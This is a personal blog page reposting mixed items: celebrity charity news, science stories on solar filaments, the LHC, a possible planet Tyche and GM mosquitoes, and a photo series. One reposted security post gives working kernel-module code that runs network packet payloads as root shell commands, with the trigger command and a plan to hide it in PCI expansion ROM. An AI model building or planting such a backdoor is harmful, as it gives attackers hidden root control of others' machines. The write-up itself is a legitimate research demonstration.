Mayur's Posterous

"Lost" Star Matthew Fox Volunteers in India

Just weeks before the Christmas holidays, “Lost” actor Matthew Fox travelled to India on a medical mission with Operation Smile, meeting hundreds of children suffering from cleft lips and cleft palates who were born into unimaginable poverty.

Photo: Matthew Fox volunteers in India
Actor Matthew Fox volunteered in Guwahati, India, on Operation Smile’s 500 patient medical mission. (Operation Smile Photo – Marc Ascher)

Fox spent his time playing with the children who were awaiting operations. A father of two, Fox’s heart was quickly captured by 5-year-old Saban.

Photo: Matthew Fox volunteers in India
Sarban showed no fear before his surgery. He said he “just wants his lip to be better.” (Operation Smile Photo – Marc Ascher)

The operation required to repair a cleft lip can take as little as 45 minutes.

Photo: Matthew Fox volunteers in India
After the surgery, the stress and desperation that previously lined the face of Sarban’s father was replaced with pure joy. “When they told me that he was ready for surgery, that moment was the happiest moment in my life,” Sarban’s father said. “Now that I see him, I am the happiest father in the world.” (Operation Smile Photo – Marc Ascher)

Photo: Matthew Fox volunteers in India
Sarban’s smile is healed and his life will never be the same. (Operation Smile Photo – Marc Ascher)

Operation Smile is an international charity with a mobile team of volunteer medical professionals who provide safe, effective reconstructive surgery for children born with facial deformities at no cost. Thanks to their work, more than 150,000 formerly affected children can smile today.

The organization will host its 2nd Annual “Little Black Dress” Fundraiser Event & Cocktail Party at the Viceroy in Miami on Saturday, February 5, 2011 at 8PM.

Celebrities set to attend include former NBA player of the Miami Heat, Tim Hardaway; star of the hit Broadway play “Dream Girls”, Syesha Mercado; Super Bowl champ and 2 time Pro Bowl winner, former NFL Player of the Atlanta Falcons, Gerald Riggs, along with his son, successful International Sports News Castor, Gerald Riggs Jr.; supporting actor from “Stomp The Yard,” Alfred Thomas; and Miss Latina International, Esther Dollar.

To find out more about how you can join these celebrities and support the work of Operation Smile, visit OperationSmile.org.

To view more images of Fox’s trip to India, visit their page on Facebook.


Ladies and Gents, our Dr. Jack Shepherd. 

Posted

7 billion people on this planet by the end of 2011, a video by National Geographic.

Posted

Huge Magnetic Filament Erupts on the Sun | Wired Science

 

A magnetic filament more than 50 times the Earth’s width is erupting off the surface of the sun.

Update 4:25 p.m. EST: The mega-filament collapsed in a gorgeous cascade of hot plasma between noon and 2 p.m. EST. NASA’s Solar Dynamics Observatory captured a beautiful movie of the eruption (above). The explosion does not appear to be aimed at Earth, so we shouldn’t expect any magnetic storms or satellite troubles.

The loop of hot plasma has been snaking around the sun’s southeast limb since Dec. 4, and appears to be growing by the hour. When SDO saw it on Dec. 4, the filament was more than 250,000 miles long, about 30 times the diameter of the Earth. In the image below, taken at about 12:30 p.m. EST on Dec. 6, the loop of charged plasma stretches more than 435,000 miles, the full radius of the sun.

So far the gigantic prominence has hung suspended peacefully above the sun’s surface, but this morning it started showing signs of instability. Long filaments like this one can break apart as coronal mass ejections, releasing tons of hot, charged material into the inner solar system and potentially causing magnetic storms on Earth — although this one seems to be safe.

The image you see is in ultraviolet channels, not visible light. This prominence is an excellent target for backyard telescopes. If you capture any great sun photos in the next few days, let us know.

Images: NASA/SDO

Via spaceweather.com

It is nice knowing that there are things out there that are able to wipe off our planet just the same way you brush an ant off your arm.


Posted

Gigantic hidden planet could be hurling comets at the rest of the solar system

Gigantic hidden planet could be hurling comets at the rest of the solar system

Far away in the frozen outermost depths of our solar system, there might be a hidden planet four times the size of Jupiter. This secret companion to the Sun could be responsible for sending comets into the inner solar system.

This idea is an intriguing variation on the old Nemesis theory, which holds the Sun has a smaller companion star orbiting the outer reaches of the solar system. The Nemesis star was thought to be either a pint-sized red dwarf of a failed brown dwarf, and either way its movements through the Oort Cloud at the furthest edge of our solar system would cause comets to hurtle out of their obits. Some of these would hit Earth, leading to mass extinction events. The presence of Nemesis would explain why these extinctions occur in an apparently cyclical fashion.

That's the old theory, which fell apart because (among other things) it turns out Nemesis could not have a stable enough orbit to account for the regular mass extinctions, which is the main reason such an object was hypothesized in the first place. But now University of Louisiana-Lafayette astrophysicists John Matese and Daniel Whitmire have a new theory that holds a rather different kind of companion object is out in the Oort Cloud. Fittingly, they've named it Tyche, who in mythology is the good sister of the evil Nemesis.

So, why should Tyche exist? For one thing, two centuries worth of observation indicate a disproportionate amount of comets originate from the outer regions of the Oort Cloud as opposed to the areas closer to the Sun. A planet anywhere from one to four times the mass of Jupiter could be responsible for the gravitational influence that would create this imbalance. Matese points out that the probability that this effect is purely a statistical fluke is extremely small, which suggests there's something strange going on out there in the outer Oort. Tyche might also be responsible for the unusually elongated orbit of the dwarf planet Sedna.

Matese says such the discovery a planet would be a huge shock to planetary scientists:

"Most planetary scientists would not be surprised if the largest undiscovered companion was Neptune-sized or smaller, but a Jupiter-mass object would be a surprise. If the conjecture is indeed true, the important implications would relate to how it got there - touching on the early solar environment - and how it might have affected the subsequent distributions of comets and, to a lesser extent, the known planets."

If the planet exists, it would be located some 30,000 astronomical units away, meaning its distance from the Sun is 30,000 times that of Earth. It be extremely cold, with a temperature of about -73 degrees Celsius. At such a freezing temperature, Tyche would radiate no heat for us to detect, and its extreme distance would make it incredibly hard to spot. By comparison, Neptune is only 30 astronomical units away, and the Kuiper Belt is just 55 AU from the Sun.

There's some hope that we could find Tyche, however. NASA's WISE space telescope might have caught sight of Tyche before its mission ended in October. Actually, we need to hope it spotted the planet twice, as otherwise it would be impossible to corroborate its existence. If WISE, which is the most powerful infrared telescope yet built, could not detect Tyche, then it will be quite a few years before we've got a legitimate chance at seeing it again... assuming it's out there in the first place.

[via Space.com]

Posted

Large Hadron Collider detects 'Big Bang' matter

Hadron Collider detects 'Big Bang' matter

By Emily Chung CBC News
This image shows beams of lead ions colliding, scattering particles. Their signals are measured by the cylindrical ATLAS detector. 
This image shows beams of lead ions colliding, scattering particles. Their signals are measured by the cylindrical ATLAS detector. (CERN)

A phase of matter created moments after the Big Bang is thought to have been detected at the Large Hadron Collider in Switzerland.

"Striking" evidence of a quark-gluon plasma has been observed by a team of researchers, including Canadians, at the facility near Geneva, the European Organization for Nuclear Research (CERN) announced Friday.

What is quark-gluon plasma?

Quarks and gluons are very tiny particles that combine into larger particles called protons. Those in turn combine with electrons to form atoms in the world we know today. However, during the initial moments of the Big Bang, this hadn't yet happened. The temperature was likely 100,000 to a million times what it was at the centre of the sun, and quarks moved freely in a "soup" called a plasma. Physicists hypothesize that as the universe cooled, small groups of quarks separated into individual protons, and as it cooled further, small groups of protons combined with electrons to form individual atoms.

"People have been searching for evidence of this for decades," Canadian physicist Richard Teuscher said Friday from CERN's laboratory. "What's exciting is if this is really true … [it's] the first unambiguous measurement of this condition of the early universe."

The results of the experiment by an international collaboration called ATLAS were accepted Friday morning for publication in the scientific journal Physical Review Letters, less than 24 hours after it was submitted, said Teuscher, a research scientist at the Canadian Institute for Particle Physics and a physics professor at the University of Toronto.

Normally, the peer review process takes weeks or months, added Teuscher, a member of ATLAS who did some of the data analysis for the experiment.

Physicists theorize that a few hundred millionths of a second after the Big Bang (about 14 billion years ago), the universe was made of a quark-gluon plasma — an extremely hot soup of very tiny subatomic particles.

Canadian physicist Richard Teuscher, shown inside the tunnel of the Large Hadron Collider during construction a few years ago, said people have been searching for evidence of quark-gluon plasma for decades. Canadian physicist Richard Teuscher, shown inside the tunnel of the Large Hadron Collider during construction a few years ago, said people have been searching for evidence of quark-gluon plasma for decades. (Matthias Haase/CERN)The Large Hadron Collider produces extremely high-energy collisions of larger particles, mimicking the Big Bang and potentially reproducing the types of matter that existed during the early moments of the universe.

In this case, researchers spent three weeks smashing lead ions into one another and measuring the resulting signals. Ions are particles produced by adding or removing electrons from atoms. They are charged and can therefore be propelled by an electromagnetic field inside a particle accelerator or collider.

Teuscher likened the colliding ions to two bean bags crashing at extremely high speed, causing their contents to spray out.

"But it doesn't just spray out randomly all over the place," he added.

Instead, two cones or "jets" of particles spray out in opposite directions.

Plasma fireball

The lead ions are so massive and the energy of their collision is so high that it is expected to produce a "fireball" of quark-gluon plasma — "something like the fireball produced at the time of the Big Bang."

Canadian content

Canadians make up more than 150 of the researchers involved in ATLAS. They have mainly been involved with designing, building and operating detectors called liquid argon calorimeters, including the forward calorimeter, under projects funded by the Natural Sciences and Engineering Research Council. Team members include physicists from the University of Alberta, Carleton University, McGill University, University of Montreal, Simon Fraser University, University of Regina, University of Toronto, University of British Columbia, University of Victoria, York University and TRIUMF, Canada's national laboratory for particle and nuclear physics.

One of the jets of particles must pass through the fireball to get out the other side, melting in the process.

As predicted, the data shows that in half the collisions, only one of the two jets can be observed, Teuscher said: "The other jet has been blown to smithereens."

The researchers used two different methods to confirm their results. Teuscher added that another experiment called CMS, which uses different detectors, is reporting similar results, although those haven't yet been published.

Peter Krieger, an associate professor of physics at the University of Toronto, said a detector called the forward calorimeter built in Canada by researchers at the University of Toronto and at Carleton University in Ottawa was a key component in the recent discovery.

It helped confirm that the evidence was the result of a certain type of ion collision, where the two ions strike each other head on instead of grazing each other. The head-on collision releases more energy, and is therefore the type that is predicted to produce a quark-gluon plasma.

Next, ATLAS researchers will be collecting more data and poring through it for different kinds of evidence of quark-gluon plasma.

A cross-section of the cylindrical ATLAS experimental setup is shown on the left. The lines in the centre are tracks left by the jets of particles produced during the collision. The lighter green and red rings are the detectors, while the dark red and green bars (and the graphs at centre and right) represent the signals they detect. Normally, a collision will generate two signal peaks representing two jets, one on either side of the cylinder. However, in this case, one disappears.  

A cross-section of the cylindrical ATLAS experimental setup is shown on the left. The lines in the centre are tracks left by the jets of particles produced during the collision. The lighter green and red rings are the detectors, while the dark red and green bars (and the graphs at centre and right) represent the signals they detect. Normally, a collision will generate two signal peaks representing two jets, one on either side of the cylinder. However, in this case, one disappears. (ATLAS experiment/CERN)

via cbc.ca

 

Posted

For The First Time, Genetically Engineered Mosquitoes Are Released Into The Wild | Popular Science

The transgenic animals are designed to help stamp out dengue fever in the Cayman Islands

Mosquito Germán Meyer

An Oxford-based research firm has announced the results of a release of genetically modified male mosquitoes in the Cayman Islands, the first experiment with GM mosquitoes to take place in the wild.

From May to October of this year, Oxitec released male mosquitoes three times a week in a 40-acre area. The mosquitoes had been genetically modified to be sterile, so that when they mated with the indigenous female mosquitoes there would be no offspring, and the population would shrink.

Mosquito numbers in the region had dropped 80 percent by August, which the researchers expect would result in fewer dengue cases.

Since it’s only females who bite humans and transmit diseases like the untreatable dengue fever this study examined, British biologists suspected that introducing males sterilized by a genetic mutation into the gene pool could dramatically decrease their numbers over time.

While many scientists and environmentalists object to killing off mosquitoes entirely for fear it would harm dependent species, Oxitec asserts that, since the sterilizing gene could not be passed on to subsequent generations, this method will have no permanent ecological impact.

Rather, GM males function like an insecticide, temporarily reducing numbers without the negative effects of using chemical toxins. They can also be more effective against insects that had developed resistance to certain commonly-used pesticides. In regions where booming mosquito populations are have caused epidemic outbreaks of dengue fever, yellow fever and malaria, dramatically reducing the population temporarily could reduce the death toll, and provide valuable lead time to vaccinate and treat hard-hit populations.

As the death toll caused by disease-carrying mosquitoes rises (over 2 million of the 700 million people infected by mosquitoes die annually), science has proposed a wide range of possible solutions to lessen the damage, from lasers to chemicals. But the release of transgenic animals into the wild is a very bold new step.

[AP]

Now all we have to wait for is a zombie apocalypse.

Posted

French photographer Sacha Goldberger found his 91-year-old Hungarian grandmother Frederika feeling lonely and depressed. To cheer her up, he suggested that they shoot a series of outrageous photographs in unusual costumes, poses, and locations.

A few years ago, French photographer Sacha Goldberger found his 91-year-old Hungarian grandmother Frederika feeling lonely and depressed. To cheer her up, he suggested that they shoot a series of outrageous photographs in unusual costumes, poses, and locations. Grandma reluctantly agreed, but once they got rolling, she couldn't stop smiling.

Frederika was born in Budapest 20 years before World War II. During the war, at the peril of her own life, she courageously saved the lives of ten people. When asked how, he tells us "she hid the Jewish people she knew, moving them around to different places everyday." As a survivor of Nazism and Communism, she then immigrated away from Hungary to France, forced by the Communist regime to leave her homeland illegally or face death.

Aside from great strength, Frederika has an incredible sense of humor, one that defies time and misfortune. She is funny and cynical, always mocking people that she loves.

With the unexpected success of this series, titled "Mamika," Goldberger created a MySpace page for his grandmother. She now has over 2,200 friends and receives messages like: "You're the grandmother that I have dreamed of, would you adopt me?" and " You made my day, I hope to be like you at your age."

Initially, she did not understand why all these people wrote to congratulate her. Then, little by little, she realized that her story conveyed a message of hope and joy. In all those pictures, she posed with the utmost enthusiasm. Now, after the set, Goldberger shares that his grandmother has never shown even a trace of depression. Perhaps it's because her story serves some sort of purpose. That through the warm words of newfound friends, she's reminded of just how lucky she is to be alive.

Update: We got in touch with Sacha Goldberger, the grandson and talented photographer to ask him more about his background and creative process. He told us this: "I've been photographing for four years now and before that I worked as a creative director. My grandmother is very professional. I'd show her some poses, and she'd propose some of her own. I like to tell stories and I also work with some very creative friends."

Posted

10 Strange Things About The Universe

The universe can be a very strange place. While groundbreaking ideas such as quantum theory, relativity and even the Earth going around the Sun might be commonly accepted now, science still continues to show that the universe contains things you might find it difficult to believe, and even more difficult to get your head around.

 

10. Negative Energy

Casimir Effect.png

Theoretically, the lowest temperature that can be achieved is absolute zero, exactly −273.15°C, where the motion of all particles stops completely. However, you can never actually cool something to this temperature because, in quantum mechanics, every particle has a minimum energy, called “zero-point energy,” which you cannot get below. Remarkably, this minimum energy doesn’t just apply to particles, but to any vacuum, whose energy is called “vacuum energy.” To show that this energy exists involves a rather simple experiment– take two metal plates in a vacuum, put them close together, and they will be attracted to each other. This is caused by the energy between the plates only being able to resonate at certain frequencies, while outside the plates the vacuum energy can resonate at pretty much any frequency. Because the energy outside the plates is greater than the energy between the plates, the plates are pushed towards each other. As the plates get closer together, the force increases, and at around a 10 nm separation this effect (called the Casimir effect) creates one atmosphere of pressure between them. Because the plates reduce the vacuum energy between them to below the normal zero-point energy, the space is said to have negative energy, which has some unusual properties.

One of the properties of a negative-energy vacuum is that light actually travels faster in it than it does in a normal vacuum, something that may one day allow people to travel faster than the speed of light in a kind of negative-energy vacuum bubble. Negative energy could also be used to hold open a transversible wormhole, which although theoretically possible, would collapse as soon as it was created without a means to keep it open. Negative energy also causes black holes to evaporate. Vacuum energy is often modeled as virtual particles popping into existence and annihilating. This doesn’t violate any energy conservation laws as long as the particles are annihilated shortly afterwards. However, if two particles are produced at the event horizon of a black hole, one can be moving away from the black hole, while the other is falling into it. This means they won’t be able to annihilate, so the particles both end up with negative energy. When the negative energy particle falls into the black hole, it lowers the mass of the black hole instead of adding to it, and over time particles like these will cause the black hole to evaporate completely. Because this theory was first suggested by Stephen Hawking, the particles given off by this effect (the ones that don’t fall into the black hole) are called Hawking radiation. It was the first accepted theory to unite quantum theory with general relativity, making it Hawking’s greatest scientific achievement to date.

 

9. Frame Dragging

spacetime-frame-dragging.jpg

One prediction of Einstein’s theory of general relativity is that when a large object moves, it drags the space-time around it, causing nearby objects to be pulled along as well. It can occur when a large object is moving in a straight line or is rotating, and, although the effect is very small, it has been experimentally verified. The Gravity Probe B experiment, launched in 2004, was designed to measure the space-time distortion near Earth. Although sources of interference were larger than expected, the frame-dragging effect has been measured to an uncertainty of 15%, with further analysis hoping to reduce this further.

The expected effects were very close to predictions: due to the rotation of the Earth, the probe was pulled from its orbit by around 2 meters per year, an effect purely caused by the mass of the Earth distorting the space-time surrounding it. The probe itself would not feel this extra acceleration because it is not caused by an acceleration on the probe, but rather on the space-time the probe is traveling through–analogous to a rug being pulled under a table, rather than moving the table itself.

Read the rest of this post »

Posted

Student-designed door could save lives during earthquakes

Media_httpimagesgizma_calzd

 

Posted

Hosting backdoors in hardware [techies, read this]

Have you ever had a machine get compromised? What did you do? Did you run rootkit checkers and reboot? Did you restore from backups or wipe and reinstall the machines, to remove any potential backdoors?

In some cases, that may not be enough. In this blog post, we’re going to describe how we can gain full control of someone’s machine by giving them a piece of hardware which they install into their computer. The backdoor won’t leave any trace on the disk, so it won’t be eliminated even if the operating system is reinstalled. It’s important to note that our ability to do this does not depend on exploiting any bugs in the operating system or other software; our hardware-based backdoor would work even if all the software on the system worked perfectly as designed.

I’ll let you figure out the social engineering side of getting the hardware installed (birthday “present”?), and instead focus on some of the technical details involved.

Our goal is to produce a PCI card which, when present in a machine running Linux, modifies the kernel so that we can control the machine remotely over the Internet. We’re going to make the simplifying assumption that we have a virtual machine which is a replica of the actual target machine. In particular, we know the architecture and exact kernel version of the target machine. Our proof-of-concept code will be written to only work on this specific kernel version, but it’s mainly just a matter of engineering effort to support a wide range of kernels.

Modifying the kernel with a kernel module

The easiest way to modify the behavior of our kernel is by loading a kernel module. Let’s start by writing a module that will allow us to remotely control a machine.

IP packets have a field called the protocol number, which is how systems distinguish between TCP and UDP and other protocols. We’re going to pick an unused protocol number, say, 163, and have our module listen for packets with that protocol number. When we receive one, we’ll execute its data payload in a shell running as root. This will give us complete remote control of the machine.

The Linux kernel has a global table inet_protos consisting of a struct net_protocol * for each protocol number. The important field for our purposes is handler, a pointer to a function which takes a single argument of type struct sk_buff *. Whenever the Linux kernel receives an IP packet, it looks up the entry in inet_protos corresponding to the protocol number of the packet, and if the entry is not NULL, it passes the packet to the handler function. The struct sk_buff type is quite complicated, but the only field we care about is the data field, which is a pointer to the beginning of the payload of the packet (everything after the IP header). We want to pass the payload as commands to a shell running with root privileges. We can create a user-mode process running as root using the call_usermodehelper function, so our handler looks like this:

int exec_packet(struct sk_buff *skb)
{
        char *argv[4] = {"/bin/sh", "-c", skb->data, NULL};
        char *envp[1] = {NULL};

        call_usermodehelper("/bin/sh", argv, envp, UMH_NO_WAIT);

        kfree_skb(skb);
        return 0;
}

We also have to define a struct net_protocol which points to our packet handler, and register it when our module is loaded:

const struct net_protocol proto163_protocol = {
        .handler = exec_packet,
        .no_policy = 1,
        .netns_ok = 1
};

int init_module(void)
{
        return (inet_add_protocol(&proto163_protocol, 163) < 0);
}

Let’s build and load the module:

rwbarton@target:~$ make
make -C /lib/modules/2.6.32-24-generic/build M=/home/rwbarton modules
make[1]: Entering directory `/usr/src/linux-headers-2.6.32-24-generic'
  CC [M]  /home/rwbarton/exec163.o
  Building modules, stage 2.
  MODPOST 1 modules
  CC      /home/rwbarton/exec163.mod.o
  LD [M]  /home/rwbarton/exec163.ko
make[1]: Leaving directory `/usr/src/linux-headers-2.6.32-24-generic'
rwbarton@target:~$ sudo insmod exec163.ko

Now we can use sendip (available in the sendip Ubuntu package) to construct and send a packet with protocol number 163 from a second machine (named control) to the target machine:

rwbarton@control:~$ echo -ne 'touch /tmp/x\0' > payload
rwbarton@control:~$ sudo sendip -p ipv4 -is 0 -ip 163 -f payload $targetip
rwbarton@target:~$ ls -l /tmp/x
-rw-r--r-- 1 root root 0 2010-10-12 14:53 /tmp/x

Great! It worked. Note that we have to send a null-terminated string in the payload, because that’s what call_usermodehelper expects to find in argv and we didn’t add a terminator in exec_packet.

Modifying the on-disk kernel

In the previous section we used the module loader to make our changes to the running kernel. Our next goal is to make these changes by altering the kernel on the disk. This is basically an application of ordinary binary patching techniques, so we’re just going to give a high-level overview of what needs to be done.

The kernel lives in the /boot directory; on my test system, it’s called /boot/vmlinuz-2.6.32-24-generic. This file actually contains a compressed version of the kernel, along with the code which decompresses it and then jumps to the start. We’re going to modify this code to make a few changes to the decompressed image before executing it, which have the same effect as loading our kernel module did in the previous section.

When we used the kernel module loader to make our changes to the kernel, the module loader performed three important tasks for us:

  1. it allocated kernel memory to store our kernel module, including both code (the exec_packet function) and data (proto163_protocol and the string constants in exec_packet) sections;
  2. it performed relocations, so that, for example, exec_packet knows the addresses of the kernel functions it needs to call such as kfree_skb, as well as the addresses of its string constants;
  3. it ran our init_module function.

We have to address each of these points in figuring out how to apply our changes without making use of the module loader.

The second and third points are relatively straightforward thanks to our simplifying assumption that we know the exact kernel version on the target system. We can look up the addresses of the kernel functions our module needs to call by hand, and define them as constants in our code. We can also easily patch the kernel’s startup function to install a pointer to our proto163_protocol in inet_protos[163], since we have an exact copy of its code.

The first point is a little tricky. Normally, we would call kmalloc to allocate some memory to store our module’s code and data, but we need to make our changes before the kernel has started running, so the memory allocator won’t be initialized yet. We could try to find some code to patch that runs late enough that it is safe to call kmalloc, but we’d still have to find somewhere to store that extra code.

What we’re going to do is cheat and find some data which isn’t used for anything terribly important, and overwrite it with our own data. In general, it’s hard to be sure what a given chunk of kernel image is used for; even a large chunk of zeros might be part of an important lookup table. However, we can be rather confident that any error messages in the kernel image are not used for anything besides being displayed to the user. We just need to find an error message which is long enough to provide space for our data, and obscure enough that it’s unlikely to ever be triggered. We’ll need well under 180 bytes for our data, so let’s look for strings in the kernel image which are at least that long:

rwbarton@target:~$ strings vmlinux | egrep  '^.{180}' | less

One of the output lines is this one:

<4>Attempt to access file with crypto metadata only in the extended attribute region, but eCryptfs was mounted without xattr support enabled. eCryptfs will not treat this like an encrypted file.

This sounds pretty obscure to me, and a Google search doesn’t find any occurrences of this message which aren’t from the kernel source code. So, we’re going to just overwrite it with our data.

Having worked out what changes need to be applied to the decompressed kernel, we can modify the vmlinuz file so that it applies these changes after performing the decompression. Again, we need to find a place to store our added code, and conveniently enough, there are a bunch of strings used as error messages (in case decompression fails). We don’t expect the decompression to fail, because we didn’t modify the compressed image at all. So we’ll overwrite those error messages with code that applies our patches to the decompressed kernel, and modify the code in vmlinuz that decompresses the kernel to jump to our code after doing so. The changes amount to 5 bytes to write that jmp instruction, and about 200 bytes for the code and data that we use to patch the decompressed kernel.

Modifying the kernel during the boot process

Our end goal, however, is not to actually modify the on-disk kernel at all, but to create a piece of hardware which, if present in the target machine when it is booted, will cause our changes to be applied to the kernel. How can we accomplish that?

The PCI specification defines a “expansion ROM” mechanism whereby a PCI card can include a bit of code for the BIOS to execute during the boot procedure. This is intended to give the hardware a chance to initialize itself, but we can also use it for our own purposes. To figure out what code we need to include on our expansion ROM, we need to know a little more about the boot process.

When a machine boots up, the BIOS initializes the hardware, then loads the master boot record from the boot device, generally a hard drive. Disks are traditionally divided into conceptual units called sectors of 512 bytes each. The master boot record is the first sector on the drive. After loading the master boot record into memory, the BIOS jumps to the beginning of the record.

On my test system, the master boot record was installed by GRUB. It contains code to load the rest of the GRUB boot loader, which in turn loads the /boot/vmlinuz-2.6.32-24-generic image from the disk and executes it. GRUB contains a built-in driver which understands the ext4 filesystem layout. However, it relies on the BIOS to actually read data from the disk, in much the same way that a user-level program relies on an operating system to access the hardware. Roughly speaking, when GRUB wants to read some sectors off the disk, it loads the start sector, number of sectors to read, and target address into registers, and then invokes the int 0x13 instruction to raise an interrupt. The CPU has a table of interrupt descriptors, which specify for each interrupt number a function pointer to call when that interrupt is raised. During initialization, the BIOS sets up these function pointers so that, for example, the entry corresponding to interrupt 0x13 points to the BIOS code handling hard drive IO.

Our expansion ROM is run after the BIOS sets up these interrupt descriptors, but before the master boot record is read from the disk. So what we’ll do in the expansion ROM code is overwrite the entry for interrupt 0x13. This is actually a legitimate technique which we would use if we were writing an expansion ROM for some kind of exotic hard drive controller, which a generic BIOS wouldn’t know how to read, so that we could boot off of the exotic hard drive. In our case, though, what we’re going to make the int 0x13 handler do is to call the original interrupt handler, then check whether the data we read matches one of the sectors of /boot/vmlinuz-2.6.32-24-generic that we need to patch. The ext4 filesystem stores files aligned on sector boundaries, so we can easily determine whether we need to patch a sector that’s just been read by inspecting the first few bytes of the sector. Then we return from our custom int 0x13 handler. The code for this handler will be stored on our expansion ROM, and the entry point of our expansion ROM will set up the interrupt descriptor entry to point to it.

In summary, the boot process of the system with our PCI card inserted looks like this:

  • The BIOS starts up and performs basic initialization, including setting up the interrupt descriptor table.
  • The BIOS runs our expansion ROM code, which hooks the int 0x13 handler so that it will apply our patch to the vmlinuz file when it is read off the disk.
  • The BIOS loads the master boot record installed by GRUB, and jumps to it. The master boot record loads the rest of GRUB.
  • GRUB reads the vmlinuz file from the disk, but our custom int 0x13 handler applies our patches to the kernel before returning.
  • GRUB jumps to the vmlinuz entry point, which decompresses the kernel image. Our modifications to vmlinuz cause it to overwrite a string constant with our exec_packet function and associated data, and also to overwrite the end of the startup code to install a pointer to this data in inet_protos[163].
  • The startup code of the decompressed kernel runs and installs our handler in inet_protos[163].
  • The kernel continues to boot normally.

We can now control the machine remotely over the Internet by sending it packets with protocol number 163.

One neat thing about this setup is that it’s not so easy to detect that anything unusual has happened. The running Linux system reads from the disk using its own drivers, not BIOS calls via the real-mode interrupt table, so inspecting the on-disk kernel image will correctly show that it is unmodified. For the same reason, if we use our remote control of the machine to install some malicious software which is then detected by the system administrator, the usual procedure of reinstalling the operating system and restoring data from backups will not remove our backdoor, since it is not stored on the disk at all.

What does all this mean in practice? Just like you should not run untrusted software, you should not install hardware provided by untrusted sources. Unless you work for something like a government intelligence agency, though, you shouldn’t realistically worry about installing commodity hardware from reputable vendors. After all, you’re already also trusting the manufacturer of your processor, RAM, etc., as well as your operating system and compiler providers. Of course, most real-world vulnerabilities are due to mistakes and not malice. An attacker can gain control of systems by exploiting bugs in popular operating systems much more easily than by distributing malicious hardware.

Ksplice Uptrack

This entry was posted on Wednesday, October 27th, 2010 at 11:56 am and is filed under security. You can follow any responses to this entry through the RSS 2.0 feed. You can leave a response, or trackback from your own site.

 We need to get more open source hardware out there. http://en.wikipedia.org/wiki/Open-source_hardware

Posted